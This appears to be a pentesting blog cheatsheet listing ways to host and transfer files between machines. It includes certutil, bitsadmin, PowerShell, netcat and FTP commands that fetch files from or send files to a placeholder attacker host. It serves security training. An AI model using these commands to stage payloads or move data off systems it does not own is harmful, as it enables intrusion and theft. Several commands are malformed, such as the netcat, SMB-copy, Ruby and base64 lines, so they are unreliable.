File transfer cheatsheet for pentesters

file transfer cheatsheet
All Blog

File transfer cheatsheet for pentesters aims to provide most common ways to send files between machines during engagements .

Hosting Files

Files can be hosted using methods such as web servers, FTP, SMB, etc. The cheat sheet below provides some of the most common techniques that can be used to host files:

CommandDescription
python -m SimpleHTTPServer [PORT]
python3 -m http.server [PORT]
Python HTTP Server modules
service apache2 start; systemctl start apache2;Apache web server, requires to place files in the /var/www/html/ directory
service nginx start; systemctl start nginxNginx web server, requires to place files in or /usr/share/nginx/html or /var/www/html
php -S 0.0.0.0:PORTPHP builtin web server bundle
nc -q 0 -lvp 443 < fileNetcat listener to transfer files
nc -nv IP_ADDR 443 < fileNetcat command to send files
smbserver.py SHARE share_dirImpacket’s smbserver.py script simulates a SMB server
service smbd start; systemctl start smbdLinux Samba, a share has to be added to /etc/samba/smb.conf
service pure-ftpd start; systemctl start pure-ftpd; service proftpd start; systemctl start proftpdServices such as pure-ftpd and proftpd can be used to setup FTP servers
atftpd –daemon –port 69 ftp_dirThe atftpd utility allows to easily setup a TFTP server
ruby -rwebrick -e’WEBrick::HTTPServer.new(:Port => PORT, :DocumentRoot => Dir.pwd).start’Ruby web server using the Web brick library
ruby -run -e httpd . -p [PORT]Ruby simple http server
cpan HTTP::Server::Brick;
perl -MHTTP::Server::Brick -e ‘$s=HTTP::Server::Brick->new(port=>PORT); $s->mount(“/”=>{path=>”.”}); $s->start’
Perl Brick HTTP Server
“C:\Program Files (x86)\IIS Express\iisexpress.exe” /path:C: /port:PORTMicrosoftg IIS Express
base64 file;Encoding the file using base 64 and decoding it in the target machine

Downloading Files

Files can be downloaded through the use of various tools such as wget , curl , FTP, SMB, etc. The cheat sheet below provides some of the most common techniques that can be used to host files:

CommandDescription
wget http://ip-addr:port/file [-o output_file]Wget comes preinstalled with most Linux systems
curl http://ip-addr:port/file -o output_fileCurl comes preinstalled with most Linux and some Windows systems
certutil -urlcache -split -f “http://ip-addr:port/file” output_fileCertutil is a Windows builtin command line tool
powershell -c Invoke-WebRequest -Uri http://ip-addr:port/file -OutFile output_file;
powershell -c (New-Object Net.WebClient).DownloadFile(‘http://ip-addr:port/file’, ‘output_file’)
Powershell Invoke-WebRequest cmdlet or the System.Net.WebClient class
bitsadmin /transfer job /download /priority high http://IP_ADDR/file output_fileBitsadmin Windows command-line tool
nc -nv IP_ADDR 443 > fileNetcat command to download files from a Netcat listener
nc -q 0-lvp 443 > fileNetcat listener to receive files
copy \IP_ADDR\SHARE\output_fileCopy command to download files from an SMB share
smbget smb://domain;user[:[email protected]]server/share/path/filesmbget utility to download files from a Samba share

wget ftp://user:[email protected]_ADDR/path/file -o output_file

echo open 192.168.1.64 21> ftp.txt
echo anonymous>> ftp.txt
echo [email protected]>> ftp.txt
echo bin >> ftp.txt
echo get test.txt >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
Wget and FTP to download files from an FTP server
tftptftp -i IP_ADDR {GET | PUT} file
scp /path/file [email protected]_ADDR:/path/fileSecure File Copy SSH tool
https://gist.github.com/Richienb/51021a1c16995a07478dfa20a6db725cWindows Virtual Basic scripts
php -r “file_put_contents(‘output_file’, fopen(‘http://ip-addr:port/file’, ‘r’));”PHP file_put_contents function
python -c ‘from urllib import urlretrieve; urlretrieve(“http://ip-addr:port/file”, “output_file”)’;
python3 -c ‘from urllib.request import urlretrieve; urlretrieve(“http://ip-addr:port/file”, “output_file”)’
The Python urlretrieve function which is part of the urllib library can be used to download files
perl -MLWP::Simple -e ‘getstore(“http://IP_ADDR/file”, “out_file”)’;
perl -e ‘use LWP::Simple; getstore(“http://IP_ADDR/file”, “out_file”)’
Library for WWW in Perl
ruby -e ‘require “open-uri”;File.open(“output_file”, “wb”) do |file|;URI.open(“http://ip-addr:port/file”).read;end’Ruby Open-URI library
echo -n “base64-output” > fileDecoding the base64 output of the file

we have added most common possible ways to transfer files . however we highly encourge you to research more on this topic and try to learn other possible ways too . Also try to comment below if you have any useful technique to tranfer files in between linux to linux , windows to windows , linux to wndows machines .

Leave a Reply

Your email address will not be published. Required fields are marked *